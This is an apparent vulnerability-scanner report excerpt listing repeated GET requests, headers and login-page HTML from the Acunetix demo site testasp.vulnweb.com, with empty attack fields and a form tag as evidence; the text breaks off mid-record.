<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" 